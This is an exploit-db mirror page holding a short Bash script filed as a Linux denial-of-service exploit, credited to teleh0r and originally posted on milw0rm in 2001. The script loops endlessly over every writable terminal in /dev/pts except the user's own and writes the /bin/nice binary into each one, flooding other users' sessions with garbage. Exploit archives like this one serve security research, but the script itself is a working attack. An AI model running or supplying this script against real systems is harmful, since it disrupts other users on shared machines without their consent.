exploit-db-mirror/exploits/linux/dos/236.sh
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
309 B
Bash
Executable file

#!/bin/bash
#
# by teleh0r
TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY
while /bin/true ; do
for i in $TTYDIR/* ; do
if [ -w $i -a -c $i -a $i != $MYTTY ]; then
cat $NONSENSE > $i
fi
done
done
unset i
# milw0rm.com [2001-01-02]